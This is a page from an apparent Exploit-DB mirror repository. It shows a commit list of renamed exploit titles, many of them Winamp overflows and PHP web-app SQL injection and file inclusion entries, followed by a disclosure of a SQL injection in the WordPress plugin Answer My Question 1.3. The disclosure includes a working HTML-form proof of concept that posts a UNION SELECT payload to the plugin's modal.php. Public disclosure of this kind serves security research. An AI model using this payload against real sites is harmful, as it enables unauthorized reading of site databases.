bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40771.txt
Offensive Security b22e31535e DB: 2016-11-18 
3 new exploits

Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)
Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)

Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)
NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)

Apple Mac OSX 10.4.x Kernel -  i386_set_ldt() Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)

Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)

WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)
Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)

Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)

Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
WinAmp 5.63 - Invalid Pointer Dereference
WinAmp 5.63 - Stack Based Buffer Overflow
Winamp 5.63 - Invalid Pointer Dereference
Winamp 5.63 - Stack Based Buffer Overflow

Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)
Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)

Microsoft Edge - 'eval' Type Confusion

Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow
NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow
SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation
SCO UnixWare Reliant HA - Privilege Escalation
SCO UnixWare Merge - mcd Privilege Escalation
Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow
SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation
SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation
SCO UnixWare Merge - 'mcd' Privilege Escalation

Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.572 - whatsnew.txt Stack Overflow
Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow
Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow

Winamp 5.572 - whatsnew.txt SEH (Metasploit)
Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)

Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)
Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)

Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking
NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking

WinAmp 5.63 - (winamp.ini) Local Exploit
Winamp 5.63 - 'winamp.ini' Local Exploit

Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)

Nullsoft Winamp 2.x - AIP Buffer Overflow
NullSoft Winamp 2.x - AIP Buffer Overflow

Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow
NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow

winamp Web interface 7.5.13 - Multiple Vulnerabilities
Winamp Web interface 7.5.13 - Multiple Vulnerabilities

Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow
NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow

LinPHA 1.3.1 - (new_images.php) Blind SQL Injection
LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection

KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection
KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection

KwsPHP 1.0 - Newsletter Module SQL Injection
KwsPHP 1.0 Module Newsletter - SQL Injection
DaZPHP 0.1 - (prefixdir) Local File Inclusion
PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion
KwsPHP Module Galerie - (id_gal) SQL Injection
KwsPHP Module Archives - 'id' SQL Injection
KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection
KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection
XPOZE Pro 3.05 - (reed) SQL Injection
Vastal I-Tech Software Zone - 'cat_id' SQL Injection
sabros.us 1.75 - (thumbnails.php) Remote File Disclosure
Comdev News Publisher - SQL Injection
Affiliate Directory - 'cat_id' SQL Injection
PHP Photo Gallery 1.0 - (photo_id) SQL Injection
Blogator-script 0.95 - (incl_page) Remote File Inclusion
PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection
Blogator-script 0.95 - (id_art) SQL Injection
Dragoon 0.1 - (lng) Local File Inclusion
DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion
PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion
KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection
KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection
KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection
KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection
XPOZE Pro 3.05 - 'reed' Parameter SQL Injection
Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection
Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure
Comdev News Publisher 4.1.2 - SQL Injection
Affiliate Directory - 'cat_id' Parameter SQL Injection
PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection
Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion
PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection
Blogator-script 0.95 - 'id_art' Parameter SQL Injection
Dragoon 0.1 - 'lng' Parameter Local File Inclusion
Easynet Forum Host - 'forum.php forum' SQL Injection
CoBaLT 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' SQL Injection
Easynet Forum Host - 'forum.php' SQL Injection
Cobalt 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection
Links Directory 1.1 - 'cat_id' SQL Injection
Software Index 1.1 - 'cid' SQL Injection
Links Directory 1.1 - 'cat_id' Parameter SQL Injection
Software Index 1.1 - 'cid' Parameter SQL Injection
Blog PixelMotion - 'index.php categorie' SQL Injection
Site Sift Listings - 'id' SQL Injection
Blog PixelMotion - 'categorie' Parameter SQL Injection
Site Sift Listings - 'id' Parameter SQL Injection

Prozilla Forum Service - 'forum.php forum' SQL Injection
Prozilla Forum Service - 'forum' Parameter SQL Injection

Prozilla Freelancers - (project) SQL Injection
Prozilla Freelancers - 'project' Parameter SQL Injection
LinPHA 1.3.3 - (maps plugin) Remote Command Execution
Dragoon 0.1 - (root) Remote File Inclusion
LinPHA 1.3.3 Plugin Maps - Remote Command Execution
Dragoon 0.1 - 'root' Parameter Remote File Inclusion

k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
k-links directory - SQL Injection / Cross-Site Scripting

SFS Affiliate Directory - 'id' SQL Injection
Affiliate Directory - 'id' Parameter SQL Injection

SFS EZ Gaming Directory - 'Directory.php id' SQL Injection
SFS EZ Gaming Directory - 'directory.php' SQL Injection

SFS EZ Gaming Directory - 'cat_id' SQL Injection
SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection

LinPHA 1.3.2 - (rotate.php) Remote Command Execution
LinPHA 1.3.2 - 'rotate.php' Remote Command Execution

cobalt qube webmail 1.0 - Directory Traversal
Cobalt Qube Webmail 1.0 - Directory Traversal
LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion
LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion

LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities

Drake CMS 0.2 - 'index.php' Cross-Site Scripting

Sabros.US 1.7 - 'index.php' Cross-Site Scripting

Drake CMS 0.3.7 - 404.php Local File Inclusion
Drake CMS 0.3.7 - '404.php' Local File Inclusion

Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting

Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting

CoBaLT 2.0 - 'adminler.asp' SQL Injection
Cobalt 2.0 - 'adminler.asp' SQL Injection

VisualPic 0.3.1 - Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting

Software Index - 'signinform.php' Cross-Site Scripting

CMSimple 4.4.4 - Remote file Inclusion
CMSimple 4.4.4 - Remote File Inclusion
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
2016-11-18 05:01:22 +00:00

31 lines
965 B
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Answer My Question 1.3 Plugin for WordPress Sql Injection
# Date: 10/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/answer-my-question/
# Software Link: https://wordpress.org/plugins/answer-my-question/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3
# Tested on: Windows 8.1
1 - Description
$_POST['id'] is not escaped. Url is accessible for any user.
http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/
2 - Proof of Concept
<form method="post" action="http://localhost:1406/wp/wp-content/plugins/answer-my-question/modal.php">
<input type="text" name="id" value="0 UNION SELECT 1,2,3,4,5,6,slug,term_group,name,10,11,12 FROM wp_terms WHERE term_id=1">
<input type="submit" value="Send">
</form>
3. Solution
--
Atenciosamente
Lenon Leite
Reference in a new issue View git blame Copy permalink